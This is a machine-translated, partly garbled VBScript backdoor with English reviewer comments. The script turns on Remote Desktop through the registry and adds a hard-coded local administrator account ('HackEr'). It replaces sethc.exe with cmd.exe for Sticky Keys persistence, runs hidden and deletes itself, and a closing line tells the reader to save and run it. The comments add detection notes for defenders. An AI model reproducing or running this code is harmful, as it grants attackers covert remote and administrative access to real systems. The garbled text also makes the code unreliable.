' NOTE(review): this listing is a machine-translated paste. Keywords, object
' names, quotes and the "&" operator are garbled ("& amp", full-width
' punctuation, translated identifiers), so it is not valid VBScript as shown.
' Setup: defines the registry hive constant, sets the target host to what
' appears to be "." (the local machine), and binds to the WMI StdRegProv
' registry provider in root\default with impersonation.
const HKEY _ LOCAL _ MACHINE = & ampH80000002
strComputer =“。“
設置StdOut = WScript。標準輸出
set oReg = GetObject(“winmgmts:{ impersonation level = impersonate }!\ \“& amp;_
str計算機& amp“\root\default:StdRegProv“)
' Registry stage: creates the Terminal Server keys if absent, then writes three
' DWORD values under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server.
' Defender view: a write of fDenyTSConnections = 0 by a script host is the
' change to alert on (registry auditing, or Sysmon registry value-set events).
strkey path =“SYSTEM \ current Control set \ Control \ Terminal Server“
奧雷格。CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ TCP“
奧雷格。CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' NOTE(review): the next assignment is overwritten on the following line before
' any use, so no CreateKey call is made for the WinStations\RDP-Tcp path.
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ win stations \ RDP-Tcp“
strkey path =“SYSTEM \ current Control set \ Control \ Terminal Server“
' fDenyTSConnections = 0 turns Remote Desktop connections on for the host.
str value name =“fDenyTSConnections“
dwValue = 0
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
' Listener port written in two places (Tds\tcp and WinStations\RDP-Tcp).
' 3389 is the RDP default; the value name is presumably PortNumber (garbled).
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ TCP“
str value name =“port number“
dwValue = 3389
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ win stations \ RDP-Tcp“
str value name =“port number“
dwValue = 3389
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
' The first line appears to be a translated "On Error Resume Next": failures in
' the statements below would be silently ignored.
' Account stage (one colon-separated line, heavily garbled by translation):
' takes a user name and password from the script arguments, otherwise falls
' back to the hard-coded pair on the line; binds to the WinNT provider for the
' local computer name; appears to create a local user, set its password, add it
' to the local Administrators group, and echo the new account's ADsPath.
' Defender view: this maps to local account creation plus privileged group
' change (ATT&CK T1136.001). Hunt for Security events 4720 (account created)
' and 4732 (member added to a local group) close together, and for the
' hard-coded fallback user name as an indicator.
出錯時繼續下壹步
dim用戶名、密碼:If Wscript。然後計算:username=Wscript。參數(0):password = Wscript。arguments(1):Else:username =“HackEr“:password =“393214425“:end if:set ws network = CreateObject(“WSCRIPT。NETWORK“):OS =“win nt://“& amp;wsnetwork。計算機名:Set ob = GetObject(OS):Set OE = GetObject(OS & amp;“/Administrators,group“):Set od = ob。Create(“用戶”,用戶名):od。設置密碼:od。Set of = GetObject(OS & amp;“/”& amp;用戶名和密碼。“,用戶“):oe。添加(的。ADsPath)wscript . echo。ADsPath
' The first line appears to be a translated "On Error Resume Next"; the second
' is presumably a garbled declaration of the "success" variable used below.
出錯時繼續下壹步
成功
' Creates what appears to be a WScript.Shell object for running commands.
set obj = CreateObject(“WScript。外殼”)
' Runs one cmd chain with window style 0 (hidden) and waits for it (True).
' Visible steps: takeown and cacls grant the current user full control of
' sethc.exe in system32, sethc.exe is deleted, and a file named acmd.exe is
' renamed to sethc.exe. The two "?" segments are garbled; from their operands
' they presumably copy cmd.exe to acmd.exe and back up sethc.exe.
' Defender view: this is the accessibility-features (Sticky Keys) persistence
' pattern, ATT&CK T1546.008. Detect it by file-integrity checks on sethc.exe
' (hash or signature matching cmd.exe), takeown/cacls process events aimed at
' system32 binaries, and cmd.exe running as a child of winlogon.exe. Restore
' the binary with System File Checker; requiring Network Level Authentication
' for RDP keeps the pre-logon screen out of reach of unauthenticated clients.
success = obj . run(“cmd/c takeown/f % SystemRoot % \ system32 \ sethc . exe & amp;echo y | cacls % SystemRoot % \ system32 \ sethc . exe/G % USERNAME %:F?% SystemRoot % \ system32 \ cmd . exe % SystemRoot % \ system32 \ acmd . exe?% SystemRoot % \ system32 \ sethc . exe % SystemRoot % \ system32 \ as ethc . exe & amp;del % SystemRoot % \ system32 \ sethc . exe & amp;ren % SystemRoot % \ system32 \ acmd . exe sethc . exe“,0,True)
' Appears to delete the running script file via a file-system object, which
' removes the on-disk artifact (ATT&CK T1070.004). Script-host process and
' command-line logging is then the remaining evidence of execution.
CreateObject(“腳本。文件系統對象”)。刪除文件(WScript。腳本名)
將上面的代碼復制到壹個txt中,然後將txt的擴展名改為。vbs,並運行它。